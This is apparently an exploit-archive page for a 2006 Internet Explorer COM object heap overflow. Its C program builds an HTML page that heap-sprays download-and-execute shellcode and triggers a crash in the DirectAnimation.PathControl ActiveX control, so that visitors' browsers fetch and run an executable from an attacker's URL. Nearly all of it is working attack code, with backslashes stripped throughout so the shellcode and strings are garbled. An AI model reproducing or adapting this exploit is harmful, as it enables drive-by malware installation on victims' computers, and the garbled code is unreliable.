MS Internet Explorer COM Object Remote Heap Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Internet Explorer COM Object Remote Heap Overflow Exploit
# Published : 2006-09-13
# Author : nop
# Previous Title : WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit
# Next Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
/*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!!  Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org
*          :
* Tested   : Windows 2000 Server SP4 CN
*          :     + Internet Explorer 6.0 SP1
*          : Windows XP SP2 CN
*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
*          :
* Complie  : cl daxctle2.c
*          :
* Usage       :d:>daxctle2
*          :
*          :Usage: daxctle <URL> [htmlfile]
*          :
*          :d:>daxctle2 http://xsec.org/xxx.exe xxx.htm
*          :
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =     
"xe9xa3x00x00x00x5fx64xa1x30x00x00x00x8bx40x0cx8b"
"x70x1cxadx8bx68x08x8bxf7x6ax04x59xe8x43x00x00x00"
"xe2xf9x68x6fx6ex00x00x68x75x72x6cx6dx54xffx16x95"
"xe8x2ex00x00x00x83xecx20x8bxdcx6ax20x53xffx56x04"
"xc7x04x03x5cx61x2ex65xc7x44x03x04x78x65x00x00x33"
"xc0x50x50x53x57x50xffx56x10x8bxdcx50x53xffx56x08"
"xffx56x0cx51x56x8bx75x3cx8bx74x2ex78x03xf5x56x8b"
"x76x20x03xf5x33xc9x49x41xadx03xc5x33xdbx0fxbex10"
"x3axd6x74x08xc1xcbx0dx03xdax40xebxf1x3bx1fx75xe7"
"x5ex8bx5ex24x03xddx66x8bx0cx4bx8bx5ex1cx03xddx8b"
"x04x8bx03xc5xabx5ex59xc3xe8x58xffxffxffx8ex4ex0e"
"xecxc1x79xe5xb8x98xfex8ax0exefxcexe0x60x36x1ax2f"
"x70";    

char * header =
"<html>n"
"<head>n"
"<title>XSec.org</title>n"
"</head>n"
"<body>n"
"<script>n"
"shellcode = unescape("%u4343"+"%u4343"+"%u4343" + n";

// Change this script by yourself.
char * footer =
"bigbk = unescape("%u0D0D%u0D0D");n"
"headersize = 20;n"
"slackspace = headersize + shellcode.lengthn"
"while (bigbk.length < slackspace) bigbk += bigbk;n"
"fillbk = bigbk.substring(0, slackspace);n"
"bk = bigbk.substring(0, bigbk.length-slackspace);n"
// bk = nop+nop;-)
"while(bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;n"  
"memory = new Array();n"
"for (i=0;i<800;i++) memory[i] = bk + shellcode;n"
"var target = new ActiveXObject("DirectAnimation.PathControl");n"
"target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));n"
"</script>n"
"</body>n"
"</html>n";

// print unicode shellcode
void PrintUc(char *lpBuff, int buffsize)
{
   int i,j;
   char *p;
   char msg[4];

   for(i=0;i<buffsize;i+=2)
       {
       if((i%16)==0)
       {
           if(i!=0)
           {
               printf(""n"");
               fprintf(fp, "%s", "" +n"");
           }
           else
           {
               printf(""");
               fprintf(fp, "%s", """);
           }
       }
           
       printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
       
       fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
     }
     

       printf("";n");
       fprintf(fp, "%s", "");n");          
   
   
   fflush(fp);
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};

   int sc_len = 0;


        if (argc < 2)
   {
         printf("Internet Explorer COM Object Remote Heap Overflow Download Exec Exploitn");
         printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.orgn");
         //printf("!!! 0Day !!! Please Keep Private!!!n");
       printf("rnUsage: %s <URL> [htmlfile]rnn", argv[0]);
       exit(1);
   }
   
   url = argv[1];
   
   //if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
        {
            //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.n");
            printf("[-] Invalid url. Must start with 'http://','ftp://'n");
            return;                
        }

      printf("[+] download url:%sn", url);
      
      if(argc >=3) file = argv[2];
      printf("[+] exploit file:%sn", file);
       
   fp = fopen(file, "w");
   if(!fp)
   {
       printf("[-] Open file error!n");
          return;
   }    
   
   // print html header
   fprintf(fp, "%s", header);
   fflush(fp);
   
   // print shellcode
   memset(buf, 0, sizeof(buf));
   sc_len = sizeof(sc)-1;
   memcpy(buf, sc, sc_len);
   memcpy(buf+sc_len, url, strlen(url));
   
   sc_len += strlen(url)+1;
   PrintUc(buf, sc_len);
 
   // print html footer
   fprintf(fp, "%s", footer);
   fflush(fp);  
   
   printf("[+] exploit write to %s success!n", file);
}

// www.Syue.com [2006-09-13]